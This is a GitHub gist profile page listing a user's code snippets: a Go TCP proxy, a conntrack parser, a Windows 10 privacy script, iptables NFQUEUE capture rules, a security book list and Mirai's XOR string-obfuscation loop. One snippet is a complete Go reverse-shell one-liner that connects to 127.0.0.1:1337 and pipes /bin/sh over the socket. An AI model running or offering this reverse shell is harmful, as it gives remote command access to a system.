Skip to content

Instantly share code, notes, and snippets.

Mohammad Bilal furusiyya

View GitHub Profile
@furusiyya
furusiyya / proxy_copy.go
Created Aug 22, 2016 — forked from jbardin/proxy_copy.go
Go TCP Proxy pattern
View proxy_copy.go
package proxy
import (
"io"
"log"
"net"
)
func Proxy(srvConn, cliConn *net.TCPConn) {
// channels to wait on the close event for each connection
View Cyber Sec.
# CySecBooks
============
## Repo Content
- A Guide to Kernel Exploitation Attacking the Core
- Computer Networking A Top-Down Approach
- Fuzzing Brute Force Vulnerability Discovery
- Gray Hat Python - Python Programming for Hackers and Reverse Engineers (2009)
- Hacking - The Art of Exploitation, 2nd Ed.
- Metasploit, Penetration Testers Guide
@furusiyya
furusiyya / conntrack.go
Created Dec 9, 2016
I only track for NEW TCP events and log their (src ip, src port, dst port) in a non-blocking channel (FIFO queue). When tcp server receive packet, it compare its src ip and src port with channel entries and get destination port of matching one. Same I do udp server.
View conntrack.go
package glutton
import (
"bufio"
"bytes"
"os/exec"
"regexp"
)
const tcpRegExp = `\[\w+]\s+\w+\s+.+?src=(\d+\.\d+\.\d+\.\d+)\s+dst=(\d+\.\d+\.\d+\.\d+)\s+sport=(\d+)\s+dport=(\d+)\s+`
@furusiyya
furusiyya / extract_call.py
Created Jan 2, 2017 — forked from singe/extract_call.py
Pythonista script to extract a phone number from copy pasted text, add it to your Contacts if it doesn't exist, then call it.
View extract_call.py
import re
import clipboard
import console
import webbrowser
import urllib
import contacts
import datetime
import dialogs
def extract_num(input):
@furusiyya
furusiyya / MiraiObfuscation
Created Jan 2, 2017
Actual Mirai obfuscation.
View MiraiObfuscation
for (i = 0; i < *len; i++)
{
 cpy[i] ^= 0xDE;
 cpy[i] ^= 0xAD;
 cpy[i] ^= 0xBE;
 cpy[i] ^= 0xEF;
}
(facepalm)
@furusiyya
furusiyya / reclaimWindows10.ps1
Created Jan 10, 2017 — forked from alirobe/reclaimWindows10.ps1
"Reclaim Windows 10" turns off a bunch of unnecessary Windows 10 telemetery, removes bloatware, and privacy invasions. Review and tweak before running. Scripts for reversing are included and commented. Fork via https://github.com/Disassembler0 (different defaults)
View reclaimWindows10.ps1
##########
# Win10 Initial Setup Script
# Author: Disassembler <disassembler@dasm.cz>
# Version: 1.7, 2016-08-15
# dasm's script: https://github.com/Disassembler0/Win10-Initial-Setup-Script/
# THIS IS A PERSONALIZED VERSION
# This script leaves more MS defaults on, including MS security features.
# Tweaked based on personal preferences for @alirobe 2016-11-16 - v1.7.1
View elastic.conf
- "consumer.Http":
Enable: true
ID: ""
Fuse: ""
Stream:
- "foo"
- "bar"
Address: ":9000"
ReadTimeoutSec: 3
WithHeaders: true
@furusiyya
furusiyya / shell.go
Last active Feb 25, 2017 — forked from takeshixx/shell.go
TCP reverse shell | Golang
View shell.go
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go
View capturingWithNFQ.go
//IPTable rules for capturing ssh packets
//sudo iptables -A INPUT -p tcp --dport 22 -j NFQUEUE --queue-num 0
//sudo iptables -A OUTPUT -p tcp --dport 22 -j NFQUEUE --queue-num 0
//sudo iptables -A FORWARD -p tcp --dport 22 -j NFQUEUE --queue-num 0
package main
import (
View keybase.md

Keybase proof

I hereby claim:

  • I am furusiyya on github.
  • I am furusiyya (https://keybase.io/furusiyya) on keybase.
  • I have a public key whose fingerprint is 2D55 B75B D686 3D23 55A7 F44F 4C5A 29F8 C638 4CB0

To claim this, I am signing this object:

You can’t perform that action at this time.